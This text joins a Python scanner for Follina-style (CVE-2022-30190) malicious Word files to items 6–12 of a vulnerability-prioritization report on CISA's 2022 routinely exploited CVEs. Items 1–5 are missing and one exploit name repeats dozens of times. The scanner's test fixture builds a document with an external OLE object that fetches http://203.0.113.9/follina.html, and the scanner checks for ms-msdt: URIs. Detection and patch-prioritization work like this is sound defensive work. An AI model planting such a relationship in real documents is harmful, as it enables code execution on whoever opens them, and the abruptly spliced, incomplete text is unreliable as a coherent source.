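MALICIOUS_DOCX = build_docx(f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{OLE_OBJECT}" Target="http://203.0.113.9/follina.html!" TargetMode="External"/>
</Relationships>""")

# Benign: an external hyperlink (normal) and an embedded, internal OLE object.
BENIGN_DOCX = build_docx(f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK}" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OLE_OBJECT}" Target="embeddings/oleObject1.bin"/>
</Relationships>""")


def scan_docx(data: bytes) -> list:
    """Return a list of findings describing why the document is suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            part = z.read(name)
            # A document that carries the MSDT protocol URI directly
            # (for example as a hyperlink target) is flagged regardless of part.
            if b"ms-msdt:" in part.lower():
                findings.append(f"{name}: embedded ms-msdt: URI")
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(part).iter():
                if rel.tag.split("}")[-1] != "Relationship":
                    continue
                if rel.get("TargetMode") != "External":
                    continue  # internal parts are what Word normally embeds
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rtype == "oleObject" or urlsplit(target).scheme.lower() == "ms-msdt":
                    findings.append(f"{name}: external {rtype} -> {target}")
    return findings


if __name__ == "__main__":
    print("malicious:", scan_docx(MALICIOUS_DOCX))
    print("benign:", scan_docx(BENIGN_DOCX))
```

External hyperlinks are left alone on purpose: they are everywhere in normal documents, and the Follina trait is specifically an OLE object that Word fetches from the network when the file is opened, not a link the user has to click.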
6. Authentication Bypass - BIG-IP (CVE-2022-1388) - Urgent [941]
Description: On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing 
Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 
Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, F5 BIG-IP iControl RCE via REST Authentication Bypass, F5 BIG-IP iControl Remote Code Execution, F5 BIG-IP Remote Code Execution, F5 BIG-IP 16.0.x Remote Code Execution, F5 BIG-IP iControl REST vulnerability, F5 BIG-IP iControl REST vulnerability, F5 BIG-IP 16.0.x - Remote Code Execution (RCE)) |
Criticality of Vulnerability Type | 0.95 | 15 | Authentication Bypass |
Vulnerable Product is Common | 0.7 | 14 | BIG-IP is F5's Application Delivery Controller (ADC) platform; products built on it are load balancers and related traffic-management appliances, and its iControl REST management API is the component affected here |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97477, EPSS Percentile is 0.99946 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-1388 F5 Networks BIG-IP Missing Authentication Vulnerability CWE-306 Missing Authentication for Critical Function
7. Remote Code Execution - VMware Workspace One (CVE-2022-22954) - Urgent [916]
Description: VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Code Injection in Vmware Identity Manager, VMware Workspace ONE Access Template Injection / Command Execution, SRC-2022-0005 : VMware Workspace ONE Access customError.ftl Server-side Template Injection Remote Code Execution Vulnerability, VMware Workspace ONE Access Template Injection / Command Execution Exploit, VMware Workspace ONE Access CVE-2022-22954) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.5 | 14 | VMware Workspace ONE is a management platform that allows IT administrators to centrally control end users' mobile devices and cloud-hosted virtual desktops and applications from the cloud or from an on-premises deployment |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8 according to the Vulners data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97532, EPSS Percentile is 0.99981 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22954 VMware Workspace ONE Access and Identity Manager RCE CWE-94 Improper Control of Generation of Code ('Code Injection')
8. Remote Code Execution - Zoho ManageEngine ADSelfService Plus (CVE-2021-40539) - Urgent [916]
Description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-40539 Zoho ManageEngine ADSelfService Plus RCE/ Authentication Bypass CWE-287 Improper Authentication
9. Security Feature Bypass - Microsoft Exchange (CVE-2021-31207) - Urgent [913]
Description: Microsoft Exchange Server Security Feature Bypass Vulnerability
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-31207 (Proxy Shell) Microsoft Exchange Server Security Feature Bypass CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
10. Elevation of Privilege - Microsoft Exchange (CVE-2021-34523) - Urgent [865]
Description: Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34523 (Proxy Shell) Microsoft Exchange Server Elevation of Privilege CWE-287 Improper Authentication
11. Path Traversal - FortiOS (CVE-2018-13379) - Urgent [809]
Description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object, CISA object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure, FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit), FortiOS 5.6.7 / 6.0.4 Credential Disclosure, FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit (2), FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit, Fortinet FortiGate SSL VPN File Disclosure, Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure, Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)) |
Criticality of Vulnerability Type | 0.4 | 15 | Path Traversal |
Vulnerable Product is Common | 0.5 | 14 | FortiOS is Fortinet's operating system used in their hardware, such as the FortiGate firewall and switches |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8 according to the NVD data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97486, EPSS Percentile is 0.99951 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2018-13379 Fortinet FortiOS and FortiProxy SSL VPN credential exposure CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Critical (1)
12. Elevation of Privilege - VMware Workspace One (CVE-2022-22960) - Critical [732]
Description: VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to 'root'.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22960 VMware Workspace ONE Access, Identity Manager, and vRealize Automation Improper Privilege Management CWE-269 Improper Privilege Management
High (0)
Medium (0)
Low (0)
Exploitation in the wild detected (12)
Remote Code Execution (7)
- Apache Log4j2 (CVE-2021-44228)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-44228 (Log4Shell) Apache Log4j2 RCE CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
- Microsoft Exchange (CVE-2021-34473)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34473 (Proxy Shell) Microsoft Exchange Server RCE CWE-918 Server-Side Request Forgery (SSRF)
- Confluence Server (CVE-2021-26084, CVE-2022-26134)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-26084 Atlassian Confluence Server and Data Center Arbitrary code execution CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-26134 Atlassian Confluence Server and Data Center RCE CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
- Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-30190)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-30190 Microsoft Multiple Products RCE None Listed
- VMware Workspace One (CVE-2022-22954)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22954 VMware Workspace ONE Access and Identity Manager RCE CWE-94 Improper Control of Generation of Code ('Code Injection')
- Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-40539 Zoho ManageEngine ADSelfService Plus RCE/ Authentication Bypass CWE-287 Improper Authentication
Authentication Bypass (1)
- BIG-IP (CVE-2022-1388)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-1388 F5 Networks BIG-IP Missing Authentication Vulnerability CWE-306 Missing Authentication for Critical Function
Security Feature Bypass (1)
- Microsoft Exchange (CVE-2021-31207)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-31207 (Proxy Shell) Microsoft Exchange Server Security Feature Bypass CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Elevation of Privilege (2)
- Microsoft Exchange (CVE-2021-34523)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34523 (Proxy Shell) Microsoft Exchange Server Elevation of Privilege CWE-287 Improper Authentication
- VMware Workspace One (CVE-2022-22960)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22960 VMware Workspace ONE Access, Identity Manager, and vRealize Automation Improper Privilege Management CWE-269 Improper Privilege Management
Path Traversal (1)
- FortiOS (CVE-2018-13379)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2018-13379 Fortinet FortiOS and FortiProxy SSL VPN credential exposure CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Public exploit exists, but exploitation in the wild is NOT detected (0)
Other Vulnerabilities (0)